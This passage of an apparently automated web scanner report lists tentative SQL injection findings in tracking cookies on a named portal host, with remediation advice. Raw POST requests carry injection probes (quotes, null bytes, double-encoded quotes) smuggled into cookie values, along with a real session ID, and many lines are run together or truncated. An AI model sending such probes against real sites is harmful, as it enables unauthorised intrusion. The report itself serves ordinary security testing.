POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1'' ; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnorma...[SNIP]...
Response 2
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]...
1.8. http://eden.endeca.com/c/portal/render_portlet [__utma cookie]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://eden.endeca.com
Path:
/c/portal/render_portlet
Issue detail
The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1%00' ; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnorma...[SNIP]...
Response 1
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]... error ">You have entered invalid data. Please try again.</span>...[SNIP]... >Authentication fail ed. Please try again.</span>...[SNIP]...
Request 2
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1%00'' ; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnorma...[SNIP]...
Response 2
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]...
1.9. http://eden.endeca.com/c/portal/render_portlet [__utmb cookie]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://eden.endeca.com
Path:
/c/portal/render_portlet
Issue detail
The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmb cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154%2527 ; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnorma...[SNIP]...
Response 1
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]... error ">You have entered invalid data. Please try again.</span>...[SNIP]... >Authentication fail ed. Please try again.</span>...[SNIP]...
Request 2
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154%2527%2527 ; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnorma...[SNIP]...
Response 2
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]...
1.10. http://eden.endeca.com/c/portal/render_portlet [__utmb cookie]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://eden.endeca.com
Path:
/c/portal/render_portlet
Issue detail
The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064%00' ; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.2.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome
Response 1
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]... error ">You have entered invalid data. Please try again.</span>...[SNIP]... >Authentication fail ed. Please try again.</span>...[SNIP]...
Request 2
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064%00'' ; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.2.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome
Response 2
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]...
1.11. http://eden.endeca.com/c/portal/render_portlet [__utmc cookie]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://eden.endeca.com
Path:
/c/portal/render_portlet
Issue detail
The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797%00' ; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnorma...[SNIP]...
Response 1
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]... error ">You have entered invalid data. Please try again.</span>...[SNIP]... >Authentication fail ed. Please try again.</span>...[SNIP]...
Request 2
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797%00'' ; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnorma...[SNIP]...
Response 2
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]...
1.12. http://eden.endeca.com/c/portal/render_portlet [__utmv cookie]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://eden.endeca.com
Path:
/c/portal/render_portlet
Issue detail
The __utmv cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmv cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmv cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.2.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com%2527 _p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome
Response 1
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]... error ">You have entered invalid data. Please try again.</span>...[SNIP]... >Authentication fail ed. Please try again.</span>...[SNIP]...
Request 2
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.2.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com%2527%2527 _p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome
Response 2
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]...
1.13. http://eden.endeca.com/c/portal/render_portlet [__utmx cookie]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://eden.endeca.com
Path:
/c/portal/render_portlet
Issue detail
The __utmx cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmx cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3' ; __utmxx=55694975.; __ALC_START=1319113064; __ALC_OREF=Direct; __ALC_CLIENT_ID=6443-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnorma...[SNIP]...
Response 1
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]... error ">You have entered invalid data. Please try again.</span>...[SNIP]... >Authentication fail ed. Please try again.</span>...[SNIP]...
Request 2
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3'' ; __utmxx=55694975.; __ALC_START=1319113064; __ALC_OREF=Direct; __ALC_CLIENT_ID=6443-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnorma...[SNIP]...
Response 2
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]...
1.14. http://eden.endeca.com/c/portal/render_portlet [__utmxx cookie]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://eden.endeca.com
Path:
/c/portal/render_portlet
Issue detail
The __utmxx cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmxx cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmxx cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3%2527 ; __ALC_START=1319113064; __ALC_OREF=Direct; __ALC_CLIENT_ID=6443-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnorma...[SNIP]...
Response 1
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]... error ">You have entered invalid data. Please try again.</span>...[SNIP]... >Authentication fail ed. Please try again.</span>...[SNIP]...
Request 2
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3%2527%2527 ; __ALC_START=1319113064; __ALC_OREF=Direct; __ALC_CLIENT_ID=6443-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnorma...[SNIP]...
Response 2
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]...
1.15. http://eden.endeca.com/c/portal/render_portlet [__utmz cookie]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://eden.endeca.com
Path:
/c/portal/render_portlet
Issue detail
The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmz cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527 ; JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.2.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome
Response 1
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]... error ">You have entered invalid data. Please try again.</span>...[SNIP]... >Authentication fail ed. Please try again.</span>...[SNIP]...
Request 2
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527%2527 ; JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.2.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome
Response 2
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]...
1.16. http://eden.endeca.com/c/portal/render_portlet [__utmz cookie]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://eden.endeca.com
Path:
/c/portal/render_portlet
Issue detail
The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
